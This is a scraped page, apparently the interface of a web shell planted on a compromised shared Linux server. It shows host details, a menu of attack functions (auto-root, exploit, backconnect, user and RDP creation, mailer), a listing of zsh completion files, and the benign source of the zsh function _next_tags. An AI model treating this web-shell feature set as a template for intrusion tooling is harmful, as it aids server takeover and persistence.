Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.20
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
zsh /
functions /
Completion /
Base /
[ HOME SHELL ]
Name
Size
Permission
Action
_all_labels
920
B
-rw-r--r--
_all_matches
970
B
-rw-r--r--
_alternative
1.93
KB
-rw-r--r--
_approximate
3.39
KB
-rw-r--r--
_arg_compile
7.39
KB
-rw-r--r--
_arguments
17.09
KB
-rw-r--r--
_bash_completions
1.33
KB
-rw-r--r--
_cache_invalid
707
B
-rw-r--r--
_call_function
737
B
-rw-r--r--
_call_program
853
B
-rw-r--r--
_combination
2.44
KB
-rw-r--r--
_comp_locale
572
B
-rw-r--r--
_complete
3.09
KB
-rw-r--r--
_complete_debug
1
KB
-rw-r--r--
_complete_help
2.59
KB
-rw-r--r--
_complete_help_generic
412
B
-rw-r--r--
_complete_tag
1.98
KB
-rw-r--r--
_correct
518
B
-rw-r--r--
_correct_filename
1.93
KB
-rw-r--r--
_correct_word
388
B
-rw-r--r--
_describe
3.62
KB
-rw-r--r--
_description
3.11
KB
-rw-r--r--
_dispatch
2.01
KB
-rw-r--r--
_expand
7.34
KB
-rw-r--r--
_expand_alias
2.02
KB
-rw-r--r--
_expand_word
307
B
-rw-r--r--
_extensions
1018
B
-rw-r--r--
_external_pwds
1.04
KB
-rw-r--r--
_generic
328
B
-rw-r--r--
_guard
177
B
-rw-r--r--
_history
1.44
KB
-rw-r--r--
_history_complete_word
3.37
KB
-rw-r--r--
_ignored
1.61
KB
-rw-r--r--
_list
822
B
-rw-r--r--
_main_complete
11.02
KB
-rw-r--r--
_match
2.37
KB
-rw-r--r--
_menu
558
B
-rw-r--r--
_message
840
B
-rw-r--r--
_most_recent_file
883
B
-rw-r--r--
_multi_parts
8.59
KB
-rw-r--r--
_next_label
600
B
-rw-r--r--
_next_tags
3.38
KB
-rw-r--r--
_normal
1.1
KB
-rw-r--r--
_nothing
90
B
-rw-r--r--
_oldlist
1.87
KB
-rw-r--r--
_pick_variant
1.15
KB
-rw-r--r--
_prefix
1.58
KB
-rw-r--r--
_read_comp
3.76
KB
-rw-r--r--
_regex_arguments
2.44
KB
-rw-r--r--
_regex_words
936
B
-rw-r--r--
_requested
268
B
-rw-r--r--
_retrieve_cache
732
B
-rw-r--r--
_sep_parts
3.72
KB
-rw-r--r--
_sequence
1.32
KB
-rw-r--r--
_set_command
815
B
-rw-r--r--
_setup
2.19
KB
-rw-r--r--
_store_cache
1.88
KB
-rw-r--r--
_sub_commands
136
B
-rw-r--r--
_tags
1.43
KB
-rw-r--r--
_user_expand
3.68
KB
-rw-r--r--
_values
3.73
KB
-rw-r--r--
_wanted
183
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : _next_tags
#compdef -k list-choices \C-xn # Main widget. _next_tags() { eval "$_comp_setup" local ins ops="$PREFIX$SUFFIX" unfunction _all_labels _next_label _all_labels() { local __gopt __len __tmp __pre __suf __ret=1 __descr __spec __prev if [[ "$1" = - ]]; then __prev=- shift fi __gopt=() zparseopts -D -a __gopt 1 2 V J x __tmp=${argv[(ib:4:)-]} __len=$# if [[ __tmp -lt __len ]]; then __pre=$(( __tmp-1 )) __suf=$__tmp elif [[ __tmp -eq $# ]]; then __pre=-2 __suf=$(( __len+1 )) else __pre=4 __suf=5 fi while comptags "-A$__prev" "$1" curtag __spec; do (( $#funcstack > _tags_level )) && _comp_tags="${_comp_tags% * }" _tags_level=$#funcstack [[ "$_next_tags_not" = *\ ${__spec}\ * ]] && continue _comp_tags+=" $__spec " if [[ "$curtag" = *[^\\]:* ]]; then zformat -f __descr "${curtag#*:}" "d:$3" _description "$__gopt[@]" "${curtag%:*}" "$2" "$__descr" curtag="${curtag%:*}" "$4" "${(P@)2}" "${(@)argv[5,-1]}" && __ret=0 else _description "$__gopt[@]" "$curtag" "$2" "$3" "${(@)argv[4,__pre]}" "${(P@)2}" "${(@)argv[__suf,-1]}" && __ret=0 fi done return __ret } _next_label() { local __gopt __descr __spec __gopt=() zparseopts -D -a __gopt 1 2 V J x if comptags -A "$1" curtag __spec; then (( $#funcstack > _tags_level )) && _comp_tags="${_comp_tags% * }" _tags_level=$#funcstack [[ "$_next_tags_not" = *\ ${__spec}\ * ]] && continue _comp_tags+=" $__spec " if [[ "$curtag" = *[^\\]:* ]]; then zformat -f __descr "${curtag#*:}" "d:$3" _description "$__gopt[@]" "${curtag%:*}" "$2" "$__descr" curtag="${curtag%:*}" set -A $2 "${(P@)2}" "${(@)argv[4,-1]}" else _description "$__gopt[@]" "$curtag" "$2" "$3" set -A $2 "${(@)argv[4,-1]}" "${(P@)2}" fi return 0 fi return 1 } if [[ "${LBUFFER%${PREFIX}}" = "$_next_tags_pre" ]]; then PREFIX="$_next_tags_pfx" SUFFIX="$_next_tags_sfx" else _next_tags_pre="${LBUFFER%${PREFIX}}" if [[ "$LASTWIDGET" = (_next_tags|list-*|*complete*) ]]; then PREFIX="$_lastcomp[prefix]" SUFFIX="$_lastcomp[suffix]" fi fi _next_tags_not+=" $_lastcomp[tags]" _next_tags_pfx="$PREFIX" _next_tags_sfx="$SUFFIX" ins="${compstate[old_insert]:+1}" _main_complete _complete _next_tags_completer [[ $compstate[insert] = automenu ]] && compstate[insert]=automenu-unambiguous [[ $compstate[insert] = *unambiguous && -n "$ops" && -z "$_lastcomp[unambiguous]" ]] && compadd -Uns "$SUFFIX" - "$PREFIX" compstate[insert]="$ins" compstate[list]='list force' compprefuncs+=( _next_tags_pre ) } # Completer, for wrap-around. _next_tags_completer() { _next_tags_not= _complete } # Pre-completion function. _next_tags_pre() { # Probably `remove' our label functions. A better test would be nice, but # I think one should still be able to edit the current word between # attempts to complete it. if [[ -n $compstate[old_insert] && $WIDGET != _next_tags ]]; then compstate[old_list]=keep compstate[insert]=menu:2 return 0 elif [[ ${LBUFFER%${PREFIX}} != ${_next_tags_pre}* ]]; then unfunction _all_labels _next_label autoload -Uz _all_labels _next_label else compprefuncs+=( _next_tags_pre ) fi } _next_tags "$@"
Close